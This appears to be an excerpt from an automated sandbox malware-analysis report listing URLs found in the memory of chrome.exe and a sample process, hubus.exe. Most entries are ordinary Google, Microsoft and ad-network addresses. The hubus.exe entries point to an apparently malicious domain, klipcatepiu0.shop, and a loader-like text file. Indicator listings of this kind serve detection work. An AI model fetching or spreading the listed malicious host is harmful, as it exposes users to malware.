                          Source: chrome.exe, 00000002.00000003.12144293546.00002D2403F1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144927817.00002D2403F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144506463.00002D2403F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12102513366.00002D2000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145351599.00002D2403F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145476171.00002D2403F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144727824.00002D2403F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145187690.00002D2403F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12185330131.00002D2000698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                          Source: chrome.exe, 00000002.00000003.12102513366.00002D2000514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/
                          Source: chrome.exe, 00000002.00000003.12102513366.00002D2000514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
                          Source: chrome.exe, 00000002.00000002.12188212582.00002D2402454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12186331740.00002D2402220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12186685247.00002D2402284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                          Source: chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net
                          Source: chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12187055049.00002D24022F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/
                          Source: chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&adk=181227
                          Source: chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&h=280&slot
                          Source: chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&h=90&slotn
                          Source: chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
                          Source: chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/si
                          Source: chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/html/r20210916/r20110914/zrt_lookup.html?fsb=1#RS-0-&adk=
                          Source: chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/html/r20210916/r20190131/zrt_lookup.html
                          Source: chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/xbbe/pixel?d=CICfxAEQ7KXQkAIY7dHaqQEwAQ&v=APEucNV8Higyb1mdtfCkDQ
                          Source: chrome.exe, 00000002.00000002.12192756587.00002D2402BC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
                          Source: chrome.exe, 00000002.00000003.12103309788.00002D20005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12103422867.00002D20005CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12103236894.00002D20005AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs
                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                          Source: chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                          Source: chrome.exe, 00000002.00000003.12103236894.00002D20005AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugsp_4x
                          Source: chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                          Source: chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/292285899
                          Source: chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/349489248
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195822771.00002D2403198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kargo.com
                          Source: chrome.exe, 00000002.00000002.12194634488.00002D2402F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197980545.00002D2403538000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12194010718.00002D2402E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
                          Source: hubus.exe, 00000001.00000002.12270439971.0000000001601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipcatepiu0.shop/
                          Source: hubus.exe, 00000001.00000002.12270439971.0000000001601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipcatepiu0.shop/R
                          Source: hubus.exe, 00000001.00000002.12270439971.0000000001601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipcatepiu0.shop/Z
                          Source: hubus.exe, 00000001.00000002.12268716447.000000000156A000.00000004.00000020.00020000.00000000.sdmp, hubus.exe, 00000001.00000002.12270439971.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipcatepiu0.shop/int_clp_ldr_sha.txt
                          Source: hubus.exe, 00000001.00000002.12272853744.0000000003FBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipcatepiu0.shop/int_clp_ldr_sha.txtl
                          Source: hubus.exe, 00000001.00000002.12270439971.0000000001601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipcatepiu0.shop/j
                          Source: hubus.exe, 00000001.00000002.12270439971.0000000001601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipcatepiu0.shop/z
                          Source: chrome.exe, 00000002.00000003.12121993386.00002D2402804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121855837.00002D2403930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121757415.00002D2402740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/gen204
                          Source: chrome.exe, 00000002.00000003.12121993386.00002D2402804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121855837.00002D2403930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121757415.00002D2402740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                          Source: chrome.exe, 00000002.00000003.12121993386.00002D2402804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121855837.00002D2403930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121757415.00002D2402740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                          Source: chrome.exe, 00000002.00000003.12121993386.00002D2402804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121855837.00002D2403930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121757415.00002D2402740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                          Source: chrome.exe, 00000002.00000002.12187278744.00002D240232C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12189270703.00002D2402670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195167249.00002D2403050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191479618.00002D2402A5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12190721731.00002D240298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12188159693.00002D2402448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142510963.00002D2402580000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                          Source: chrome.exe, 00000002.00000002.12192403438.00002D2402B60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12187278744.00002D240232C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12189270703.00002D2402670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195167249.00002D2403050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142510963.00002D2402580000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                          Source: chrome.exe, 00000002.00000002.12195822771.00002D2403198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/0
                          Source: chrome.exe, 00000002.00000002.12195822771.00002D2403198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/0BJP
                          Source: chrome.exe, 00000002.00000002.12196696307.00002D2403310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306401&rver=7.0.6738.0&wp=M
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196133996.00002D240324C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=op
                          Source: chrome.exe, 00000002.00000002.12196624797.00002D24032FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/post.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=openid
                          Source: chrome.exe, 00000002.00000002.12196624797.00002D24032FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-
                          Source: chrome.exe, 00000002.00000002.12196624797.00002D24032FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cf
                          Source: chrome.exe, 00000002.00000002.12188280827.00002D2402470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
                          Source: chrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12188460320.00002D2402524000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                          Source: chrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaultdefault
                          Source: chrome.exe, 00000002.00000002.12199175052.00002D240372C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12194699221.00002D2402F78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12193644536.00002D2402D30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12193056193.00002D2402C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12193056193.00002D2402C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
                          Source: chrome.exe, 00000002.00000003.12103309788.00002D20005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12103422867.00002D20005CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12103236894.00002D20005AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email
                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                          Source: chrome.exe, 00000002.00000003.12103236894.00002D20005AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-emailp_4x
                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12193056193.00002D2402C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
                          Source: chrome.exe, 00000002.00000003.12119566133.00002D2403774000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12120437002.00002D2403620000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myshop.amplify.com/cart
                          Source: chrome.exe, 00000002.00000002.12188212582.00002D2402454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
                          Source: hubus.exe, 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                          Source: chrome.exe, 00000002.00000002.12196696307.00002D2403310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12188534720.00002D2402544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.com/setup
                          Source: chrome.exe, 00000002.00000002.12196424496.00002D24032B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195592726.00002D2403134000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                          Source: chrome.exe, 00000002.00000002.12196513882.00002D24032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196548914.00002D24032E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
                          Source: chrome.exe, 00000002.00000002.12196513882.00002D24032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195822771.00002D2403198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
                          Source: chrome.exe, 00000002.00000002.12196513882.00002D24032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196584738.00002D24032F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1689043206&target=OPTIMIZATION_TARGET_VIS
                          Source: chrome.exe, 00000002.00000002.12196513882.00002D24032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196584738.00002D24032F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196548914.00002D24032E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1691042511&target=OPTIMIZATION_TARGET_NEW
                          Source: chrome.exe, 00000002.00000002.12196513882.00002D24032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196548914.00002D24032E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1696267841&target=OPTIMIZATION_TARGET_OMN
                          Source: chrome.exe, 00000002.00000002.12196513882.00002D24032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196584738.00002D24032F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196624797.00002D24032FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1715213284&target=OPTIMIZATION_TARGET_TEX
                          Source: chrome.exe, 00000002.00000002.12196513882.00002D24032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196584738.00002D24032F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196548914.00002D24032E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1722870342&target=OPTIMIZATION_TARGET_CLI
                          Source: chrome.exe, 00000002.00000002.12196513882.00002D24032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196548914.00002D24032E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1722870385&target=OPTIMIZATION_TARGET_GEO
                          Source: chrome.exe, 00000002.00000002.12196513882.00002D24032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195822771.00002D2403198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1722870420&target=OPTIMIZATION_TARGET_NOT
                          Source: chrome.exe, 00000002.00000002.12196696307.00002D2403310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1724079789&target=OPTIMIZATION_TARGET_CLI
                          Source: chrome.exe, 00000002.00000002.12196696307.00002D2403310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198816161.00002D2403668000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1724079821&target=OPTIMIZATION_TARGET_GEO
                          Source: chrome.exe, 00000002.00000002.12196696307.00002D2403310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196624797.00002D24032FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198816161.00002D2403668000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1724079854&target=OPTIMIZATION_TARGET_NOT
                          Source: chrome.exe, 00000002.00000002.12196513882.00002D24032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196584738.00002D24032F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=2311071436&target=OPTIMIZATION_TARGET_WEB
                          Source: chrome.exe, 00000002.00000002.12196513882.00002D24032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196584738.00002D24032F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195822771.00002D2403198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196624797.00002D24032FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=240731042095&target=OPTIMIZATION_TARGET_S
                          Source: chrome.exe, 00000002.00000002.12196513882.00002D24032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196548914.00002D24032E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=5&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paa-reporting-advertising.amazon
                          Source: chrome.exe, 00000002.00000002.12198123543.00002D2403570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/
                          Source: chrome.exe, 00000002.00000002.12194909693.00002D2402FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html
                          Source: chrome.exe, 00000002.00000002.12194909693.00002D2402FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.htmller
                          Source: chrome.exe, 00000002.00000002.12191913903.00002D2402AEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
                          Source: chrome.exe, 00000002.00000002.12192977530.00002D2402C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://passwords.google/
                          Source: chrome.exe, 00000002.00000003.12119566133.00002D2403774000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12120437002.00002D2403620000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poshmark.com/bundles/shop
                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://r2b2.io
                          Source: chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://recoveringlib.blogspot.com/
                          Source: chrome.exe, 00000002.00000002.12189028227.00002D24025C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
